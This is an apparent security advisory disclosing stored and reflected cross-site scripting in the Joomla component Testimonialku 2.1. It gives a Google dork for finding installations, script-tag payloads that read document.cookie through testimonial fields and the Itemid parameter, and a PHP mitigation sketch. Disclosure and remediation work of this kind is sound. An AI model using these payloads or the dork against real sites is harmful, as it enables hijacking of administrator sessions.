Joomla Component Testimonialku 2.1 Persistent XSS Vulnerability

Published : 2011.07.27
Credit : v3n0m
Risk : Low
CWE : CWE-79
CVE : N/A
Local : No
Remote : Yes

Joomla Component Testimonialku 2.1 Persistent XSS Vulnerability

Author : v3n0m
Twitter : http://twitter.com/#!/coresetup
Discovered : July, 27-2011 GMT +7:00 Jakarta, Indonesia
Software : Testimonialku
Developer : http://www.joomlaku.com/
License : Non-Commercial
Version : 2.1 (lower versions may also be affected)
Dorks : inurl:com_testimonialku
-----------------------------------------------------------------------

Software Description:
--------------------
Testimonialku is a simple, easy-to-use component for adding a testimonials
menu to your site. Because the component is very simple, it has no
configuration options: you only need to install and publish it.

Poc I:
-----
The Joomla component Testimonialku (com_testimonialku) 2.1 is vulnerable to
persistent XSS in the administrator panel. A malicious user can submit a
testimonial containing <script> tags (no quotes are required) and inject
that script into the administrator panel through any of the available
inputs except "email".

Fake Submission<script>alert(document.cookie)</script>

Now, when an administrator views the latest submissions, the script will
execute with that admin's permissions.

Poc II:
------
Attack Pattern: "><script>alert(document.cookie)</script>

index.php?option=com_testimonialku&Itemid="><script>alert(document.cookie)</script>
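The two PoCs share one root cause: user-controlled values (the stored testimonial fields in PoC I, the Itemid request parameter in PoC II) reach the HTML output without encoding or type validation. The following is an added, illustrative hardening sketch written for this note; it is not Testimonialku's code, and the field names and function names are assumed.

```php
<?php
// Illustrative mitigation for a testimonial-style Joomla component.
// Not Testimonialku's own code; field names and helpers are assumed.

// PoC I (stored XSS): every field that came in through the public
// submission form must be HTML-encoded at the moment it is rendered in
// the administrator list. Encoding on output neutralises the "<script>"
// payload regardless of whether it was stored with or without quotes.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_testimonial_row(array $row): string
{
    // Encode every column, including the ones an admin "trusts" (name,
    // website, message); the advisory shows all inputs except email carry
    // the payload, and email should not be special-cased either.
    $cells = array_map('esc_html', [
        $row['name'] ?? '',
        $row['email'] ?? '',
        $row['message'] ?? '',
    ]);
    return '<tr><td>' . implode('</td><td>', $cells) . '</td></tr>';
}

// PoC II (reflected XSS): Itemid is a numeric menu id, so it must be
// validated as an integer and never echoed back raw. A plain (int) cast
// turns any non-numeric value, such as the '"><script>' pattern, into 0.
// Joomla's request helpers (JRequest::getInt() in the 1.5/1.7 API) do the same.
function safe_itemid(array $query): int
{
    return isset($query['Itemid']) ? (int) $query['Itemid'] : 0;
}

// Constructed sample input using the payloads quoted in the advisory.
$submission = [
    'name'    => 'Fake Submission<script>alert(document.cookie)</script>',
    'email'   => 'submitter@example.invalid',
    'message' => '"><script>alert(document.cookie)</script>',
];
$query = ['Itemid' => '"><script>alert(document.cookie)</script>'];

echo render_testimonial_row($submission), PHP_EOL;   // script tags arrive as &lt;script&gt;
echo 'Itemid=', safe_itemid($query), PHP_EOL;        // non-numeric value collapses to an integer
```

The same two rules cover the whole advisory: encode on output for anything stored from the public form, and enforce the expected type on request parameters before they are used in a URL or in markup.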

Solution:
--------
Fix not available

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id


Copyright 2017, cxsecurity.com